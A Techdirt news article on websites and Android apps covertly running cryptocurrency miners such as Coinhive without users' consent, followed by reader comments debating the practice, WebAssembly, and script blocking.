Covert Cryptocurrency Miners Quickly Become A Major Problem

from the lessons-unlearned dept

As websites increasingly struggle to keep the lights on in the age of ad blockers, a growing number of sites have increasingly turned to bitcoin miners like Coinhive. Such miners covertly use visitor CPU cycles to mind cryptocurrency while a user is visiting a website, and actively market themselves as a creative alternative to the traditional advertising model. And while this is certainly a creative revenue generator, these miners are increasingly being foisted upon consumers without informing them or providing an opt out. Given the miners consume user CPU cycles and a modest amount of power -- that's a problem.

The Pirate Bay was forced to disable its bitcoin miner back in September, after users complained it was eating up to 90% of their available CPU cycles. Showtime was similarly caught using a bitcoin miner on two of its domains, and has yet to provide any detail on why it launched the miners or refused to inform visitors they were running. More recently, Trend Micro unveiled that at least two Android apps -- downloaded up to 50,000 times from the Google Play store -- were covertly putting crypto miners inside a hidden browser window:

Recently, we found that apps with malicious cryptocurrency mining capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER

[...]

This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.

The explosion in bitcoin miners is both above and below board. There's indication that the bitcoin miners running on Showtime's domains were the result of a website hack. More recently, researchers from security firm Sucuri discovered that at least 500 websites running WordPress had been hacked, and that other publishing platforms including Magento, Joomla, and Drupal were also being consistently abused. Reddit users this week documented how Choice Hotels (owner of Comfort Inn) websites have also been compromised with cryptocurrency miners the company itself seems oblivious to.

Political fact-checking website PolitiFact also recently acknowledged it was hacked by intruders who installed bitcoin miners that quickly gobbled up visitors' CPU cycles without permission:

Not too surprisingly, security firms like Malwarebytes have started blocking the miners:

The reason we block Coinhive is because there are site owners who do not ask for their users' permission to start running CPU-gorging applications on their systems. A regular Bitcoin miner could be incredibly simple or a powerhouse, depending on how much computing the user running the miner wants to use. The JavaScript version of a miner allows customization of how much mining to do, per user system, but leaves that up to the site owner, who may want to slow down your computer experience to a crawl.

And while these tools help some with malicious installs and hacks, plenty of websites still appear to think it's a good idea to run the miners without notifying users or providing a functioning opt out. Which means there are plenty of folks busy trying to combat the rise of ad blockers -- by engaging in the exact same behavior that caused the rise of ad blockers in the first place.


Reader Comments

Subscribe: RSS

View by: Time | Thread


  • icon
    Roger Strong (profile), 15 Nov 2017 @ 12:27pm

    The problem of people discovering bitcoin miners in web sites should go away shortly.

    Mostly because all the major browsers finally support WebAssembly. JavaScript (and C++ and other languages) can now be sent to your browser in compiled form, making it much harder to figure out what they're doing.

    So, yay?

    reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 12:33pm

      Re:

      Are there estimates of how much money can be made here? To simplify, we could assume the scripts will run as fast as a native CPU implementation... which I thought had been considered dead for a long time now, at least for Bitcoin, because there's little money to be made that way (even with unmetered electricity).

      reply to this | link to this | view in chronology ]

      • icon
        Roger Strong (profile), 15 Nov 2017 @ 12:45pm

        Re: Re:

        It would depend on how many people visit the web site.

        Imagine Netflix doing this. "Your ISP is limiting your video stream to Standard Definition. It would be a shame to waste all that GPU capability, so we'll just have the video codec also mine bitcoin while you're watching. Cheers!"

        reply to this | link to this | view in chronology ]

        • identicon
          Anonymous Coward, 15 Nov 2017 @ 1:54pm

          Re: Re: Re:

          If they make Netflix free and commercial free then I might agree with it! I rarely use anything else on my PC while nutflix is running.

          reply to this | link to this | view in chronology ]

          • identicon
            Anonymous Coward, 15 Nov 2017 @ 2:04pm

            Re: Re: Re: Re:

            You'd be paying with your own computer components' lifespan, at the very least, though. If these miners take up to 90% of your processing power, you become limited in what else you can do with your machine and wears down your (likely expensive) CPU.

            As well, who's to say Netflix will turn the mining off once you're done watching?

            reply to this | link to this | view in chronology ]

            • identicon
              Anonymous Coward, 15 Nov 2017 @ 2:10pm

              Re: Re: Re: Re: Re:

              I can buy a cheap CPU just to watch shows, but if they try to keep mining while I am not watching or mining in a way that disrupts my enjoyment then deal is off.

              I don't think mining coin on peeps CPU is a problem, as long as the users KNOW and have explicitly agreed too and as long as there is a fair exchange of value.

              heck, I might let my machine sit and crunch for them if I get fair compensation in return.

              In short, as long as all parties know & agree, then its not a problem. What I feel is fair compensation may not be what another feels is fair compensation, but that needs to be their decision.

              reply to this | link to this | view in chronology ]

            • identicon
              Anonymous Coward, 16 Nov 2017 @ 3:58am

              Re: Re: Re: Re: Re:

              wears down your (likely expensive) CPU

              CPUs are not generally considered to "wear down" with usage, as long as they're properly cooled. There should be no real effect on lifespan. Even servers used at 100% for years, as in scientific clusters, are retired because more efficient computers come along, not because they've worn out.

              reply to this | link to this | view in chronology ]

    • identicon
      Rich Kulawiec, 15 Nov 2017 @ 12:52pm

      Re:

      Well, that's disturbing. I suppose it's only a matter of time until miners are embedded in otherwise-legitimate code served by otherwise-legitimate sites.

      reply to this | link to this | view in chronology ]

      • icon
        Roger Strong (profile), 15 Nov 2017 @ 1:13pm

        Re: Re:

        We automatically remove encrypted PDF files from incoming and outgoing email, except for a VERY small whitelist of sources. This because Adobe added JavaScript support to PDF files, making them God's gift to ransomware criminals.

        I expect someone is already looking at embedding JavaScript bitcoin miners in PDF files. Device and app manuals, pirated eBooks, electronic invoices, etc.

        Or non-pirated eBooks. Add it to fanfic, put a cheap price on it and upload it to the eBook stores. A reader might have it open for hours, rather than a quick website visit.

        I wonder if you could bypass the malware detection in the Apple or Android stores by uploading a perfectly clean app, with the bitcoin miner in the PDF manual.

        reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 1:58pm

      Re:

      Shite. By that description, the code sent by this protocol is probably not auditable in any sense of the word, correct?

      reply to this | link to this | view in chronology ]

      • icon
        Roger Strong (profile), 15 Nov 2017 @ 2:12pm

        Re: Re:

        Decompilers exist for many languages. If it can be compiled into bytecode, then it can be decompiled back into something *somewhat* readable. Though never as readable as the original code.

        Since code obfuscators exist for other environments to derail decompile efforts, I expect they'll quickly be created for WebAssembly.

        reply to this | link to this | view in chronology ]

    • identicon
      Rekrul, 16 Nov 2017 @ 9:01am

      Re:

      Mostly because all the major browsers finally support WebAssembly. JavaScript (and C++ and other languages) can now be sent to your browser in compiled form, making it much harder to figure out what they're doing.

      What a great idea! Let's make it even easier for web sites to covertly run code on users' systems! I'm sure this will never be abused...

      reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 15 Nov 2017 @ 12:29pm

    "Malicious"

    And while these tools help some with malicious installs and hacks, plenty of websites still appear to think it's a good idea to run the miners without notifying users or providing a functioning opt out.

    Uh, they're not doing that out of malice (i.e. a desire to harm their users), they're doing it out of greed. An infinite loop would be easier and work just as well for malice. This is nonmalicious sociopathy, par for the course on the web (and an opt-out option wouldn't change this).

    reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 12:48pm

      Re: "Malicious"

      "Malicious"
      The Latin root word mal means “bad” or “evil.” This root is the word origin of many English vocabulary words, including malformed, maltreat, and malice. You can recall that mal means “bad” through malfunction, or a “badly” working part, and that it means “evil” through malice, or intentional “evil” done to another.

      It's just bad, m'kay?

      reply to this | link to this | view in chronology ]

      • identicon
        Anonymous Coward, 15 Nov 2017 @ 7:13pm

        Re: Re: "Malicious"

        The Latin root word mal means “bad” or “evil."

        And malice specifically means an intent to do evil or to harm others. I don't think the people running these scams give a shit about others. They've probably even got some justification so as not to consider themselves wrongdoers.

        reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 3:58pm

      Re: "Malicious"

      Greed is malicious

      reply to this | link to this | view in chronology ]

  • icon
    GMacGuffin (profile), 15 Nov 2017 @ 12:40pm

    ... probably not bitcoin

    Bitcoin's difficulty has long been too high to mine on a CPU or GPU. You essentially need specialized ASIC machines to mine bitcoin; racks of them unless you join a pool

    CoinHive's javascript miner mines monero, which is a wonderful, privacy-centric cryptocurrency -- but it is not bitcoin (the original cryptocurrency).

    Just a point of clarity. "Bitcoin" is not generic for cryptocurrency; bitcoin is a specific cryptocurrency.

    reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Cowherd, 15 Nov 2017 @ 12:45pm

    #NoScript

    reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Howard, 15 Nov 2017 @ 1:38pm

      Re:

      RIP most Firefox extensions

      reply to this | link to this | view in chronology ]

    • icon
      John85851 (profile), 16 Nov 2017 @ 10:07am

      Re:

      #UnusableSite

      In all seriousness, way too many companies are designing their websites to be unusable unless Javascript is enabled.
      Want to read the article? Enable Javascript so the formatting isn't screwed up.
      Want to see the images in the article? Enable Javascript to see them.
      Want to leave a comment on the article? Enable Javascript so the page will display the Facebook commenting system.

      reply to this | link to this | view in chronology ]

  • icon
    ShadowNinja (profile), 15 Nov 2017 @ 12:46pm

    NEVER consent to crypo-currency mining on your computer by a website

    I can't believe how many people I've seen at sites like reddit saying that these miners might be a good alternate to web ads, it's like they can't think ahead a few steps.

    For the non-computer literate, here's why bitcoin mining in place of ads is a bad idea, even with user permission.

    • We're not talking about just one site using it. We're talking about the potential for many of the websites you visit to start using it in place of ads. Even people with top of the line computers will find their computers brought to it's knees if they have enough websites open running crypto-currency miners.

    • What's to stop people from just running crypo-currency miners? This loophole to covertly mine crypo-currency is a GREAT way for a would be hacker to potentially do other malicious things to your computer to. I GUARANTEE you we'll hear about some nasty virus in the future disguising itself as a mining app.

    • Do some googling on why crypto-currency mining isn't financially worth it. A big reason why is because of the added cost to your electric bill when running your computer full force on crypo-currency mining. So yes, these crypo-currency miners COST you money. They're in effect stealing your electricity (and probably bandwidth to, which is relevant if you don't have unlimited data with no throttling).

    This is why I immediately added Crypo-currency mining to my block list in uBlock Origin the second I heard of the first story of these miner leeches.

    reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 1:07pm

      Re: NEVER consent to crypo-currency mining on your computer by a website

      Well. Just HOW are you going to prevent the obvious disaster? The sites have powerful incentive to spread this, no legal limitations, billions of knuckleheads going along, and on your side is... what?

      "it's like they can't think ahead a few steps." -- Wrong! It's not "like", it's THAT, AND WON'T. --

      Now, do you rail at Google using javascript to gain money? Why not? Same principle, and why I rail here at Google. But it's like you can't think ahead a few steps...

      reply to this | link to this | view in chronology ]

      • identicon
        Anonymous Coward, 15 Nov 2017 @ 9:40pm

        Re: Re: NEVER consent to crypo-currency mining on your computer by a website

        But when the RIAA and NSA vacuum up info to sue children, there's no cock you won't deepthroat, eh blue boy?

        reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 7:35pm

      Re: NEVER consent to crypo-currency mining on your computer by a website

      I can't believe how many people I've seen at sites like reddit saying that these miners might be a good alternate to web ads, it's like they can't think ahead a few steps.

      And what ever makes them think that mining would only be "instead of" and not wind up "in addition to" ads? Idiots.

      reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 16 Nov 2017 @ 2:46am

      Re: NEVER consent to crypo-currency mining on your computer by a website

      Still, miners have an advantage over ads: they lack a whole row of middle-men that take their share of the goods (ad brokers, ad creators, etc.)

      Both ads and miners have the risk that they will behave like parasites to the host -- gobbling up bandwidth, power, and attention. But with miners, I can imagine a future where miners will play nice, use limited resources, and become a kind of micropayment for using the website.

      reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 15 Nov 2017 @ 12:50pm

    But you don't mind Google mining info bits to track you?

    Never allow javascript, maliciously engineered from start, unless absolutely required. Get Noscript -- and remove whitelist it comes with, especially Google.

    However, since can't turn off javascript in many browsers now, just admire the infernal ingenuity of your high-tech prison...

    reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 12:55pm

      Re: But you don't mind Google mining info bits to track you?

      k

      reply to this | link to this | view in chronology ]

      • identicon
        Anonymous Coward, 15 Nov 2017 @ 1:11pm

        Re: Re: But you don't mind Google mining info bits to track you?

        >>> k

        Evidently Techdirt fanboys are down to one character replies.

        reply to this | link to this | view in chronology ]

        • identicon
          Anonymous Coward, 15 Nov 2017 @ 1:48pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          Best use of time.

          reply to this | link to this | view in chronology ]

        • identicon
          Anonymous Coward, 15 Nov 2017 @ 4:26pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          What else is there to say to a troll with a Google obsession?

          k

          reply to this | link to this | view in chronology ]

        • identicon
          Anonymous Coward, 15 Nov 2017 @ 5:14pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          Filthy TOR pirate says what?

          reply to this | link to this | view in chronology ]

          • identicon
            Anonymous Coward, 16 Nov 2017 @ 1:24am

            Re: Re: Re: Re: But you don't mind Google mining info bits to track you?

            really? tor?

            Apparently you're living in 2016....

            You can get entirely de-centralized websites now, where the entire HTML codebase is held on multiple machines.

            Tor not required, as to prevent Dcent sites you'd basically need to block 99% of all IP addresses to be sure..

            reply to this | link to this | view in chronology ]

            • identicon
              Anonymous Coward, 17 Nov 2017 @ 7:20pm

              Re: Re: Re: Re: Re: But you don't mind Google mining info bits to track you?

              This would have a point if not for the fact that out_of_the_blue has readily admitted on multiple occasions to use TOR solely for the purposes of trolling a site he absolutely loathes.

              reply to this | link to this | view in chronology ]

        • icon
          Matthew Cline (profile), 16 Nov 2017 @ 2:19am

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          "Why aren't you talking about what I want you to talk about" isn't worth responding to.

          reply to this | link to this | view in chronology ]

    • identicon
      Anonymous Coward, 15 Nov 2017 @ 1:33pm

      Re: But you don't mind Google mining info bits to track you?

      Although the ability to disable Javascript was taken out of the settings/options control panel in web browsers a few years ago, that just means you have to manually edit it (ex., "about:config" in Firefox)

      But then disabling Javascript means that you can't see any of those hidden ("flagged") comments in Techdirt, the non-pc opinions which are often the most truthful and informative comments, as well as the most discussed and debated.

      reply to this | link to this | view in chronology ]

      • identicon
        Anonymous Coward, 15 Nov 2017 @ 7:16pm

        Re: Re: But you don't mind Google mining info bits to track you?

        But then disabling Javascript means that you can't see any of those hidden ("flagged") comments in Techdirt

        Does disabling stylesheets not work any longer? (Of course it would be better for Techdirt to fix that problem so it's not necessary.)

        The Tor Browser security slider is another way to disable Javascript. At "high" it's blocked.

        reply to this | link to this | view in chronology ]

      • identicon
        Anonymous Coward, 16 Nov 2017 @ 7:50am

        Re: Re: But you don't mind Google mining info bits to track you?

        I recommend allowing for two separate instances of a browser and then configure them as you please

        reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 15 Nov 2017 @ 1:04pm

    "Are there estimates of how much money can be made here?"

    Doesn't really matter. If a company makes anything, it is pure profit because they are using visitors processors and energy. Zero costs and any payoff means a good ROI.

    reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 15 Nov 2017 @ 1:35pm

    It's stories like this that make me miss the "Punch the Monkey, Win an iPod" ads from yesteryear.

    reply to this | link to this | view in chronology ]

  • icon
    blademan9999 (profile), 15 Nov 2017 @ 3:25pm

    Possible wrong link

    Both of the first two links link to the same article.
    was that intentional?
    That article does mention both Pirate Bay and showtime though...

    reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 15 Nov 2017 @ 4:00pm

    "This JavaScript code "

    Ahhhh Ha - and there is the problem.

    reply to this | link to this | view in chronology ]

  • icon
    tom (profile), 15 Nov 2017 @ 4:46pm

    A site I frequent had this installed somehow. They removed it as soon as folks notified them. Used the web developer tools in Firefox to view the site code. Saw the call to the coinhive domain. Between Malwarebytes and Noscript, the coinhive thing never had a chance to fire off on my PC.

    Added Coinhive.com to the always block rule on my stand alone firewall appliance as another layer of defense.

    It is crap like this that totally destroy the "But we have to have auto load via javascript ads in order to survive" arguments many websites make. If you can't secure your main page, how are you going to secure the automated sell to highest bidder auto load script ad?

    reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 16 Nov 2017 @ 5:02am

    It is a less intrusive model than advertising

    I can understand that there are some teething problems. But crypto mining is certainly less of malicious than the psychological battery being perpetrated on the public by ad-tracking.

    If the client side allocates a core specifically for this, then they should be fine. The problem people are experiencing with latency is likely mostly due to shitty thread handling in browser implementations, and shitty cracking code in the early versions of this tech.

    That hopefully will get solved as the tech standardizes. The problem is that sites will use both, instead of using one or the other.

    It would be nice to see a webring that moves entirely over to this tech, and abandons web based advertising completely. I would totally prefer sites do this, instead of web based ads.

    The only way that advertising survives AI based filtering, is if the computers themselves are only rented. And I'm sure there are some lobbyists and congressmen actively working on that persuing just such a crime against the Constitution.

    So we'll see. My guess is it will be a crime to release software in the near future, unless it has fist gone through some kind of "federal modification" process. When I was a kid I had a T-shirt that said "skateboarding is not a crime". Now I expect I will soon have one that says "programming is not a crime". Funny how things stay the same.

    reply to this | link to this | view in chronology ]

    • icon
      takitus (profile), 16 Nov 2017 @ 6:12am

      Re: It is a less intrusive model than advertising

      This raises an interesting question—if a web service is going to waste cycles, would you rather have those cycles go toward mining currency or your browsing habits? Resource usage being equal, the former might be preferable.

      That said, I’d hardly call it “nice” to be asked to “allocate a core” for currency mining to view a bit of HTML.

      reply to this | link to this | view in chronology ]

  • identicon
    Rekrul, 16 Nov 2017 @ 9:09am

    Since I removed my front door for convenience, I'm having a hard time keeping burglars out. Someone should really invent something that will keep unwanted people from just walking into your home!

    reply to this | link to this | view in chronology ]

  • identicon
    Anonymous Coward, 16 Nov 2017 @ 5:27pm

    Not a bigger problem than corrupt politicians and banksters.

    reply to this | link to this | view in chronology ]


Add Your Comment

Have a Techdirt Account? Sign in now. Want one? Register here
Get Techdirt’s Daily Email
Use markdown for basic formatting. HTML is no longer supported.
  Save me a cookie
Follow Techdirt
Techdirt Gear
Show Now: Takedown
Advertisement
Report this ad  |  Hide Techdirt ads
Essential Reading
Techdirt Deals
Report this ad  |  Hide Techdirt ads
Techdirt Insider Chat
Advertisement
Report this ad  |  Hide Techdirt ads
Recent Stories
Advertisement
Report this ad  |  Hide Techdirt ads

Close

Email This

This feature is only available to registered users. Register or sign in to use it.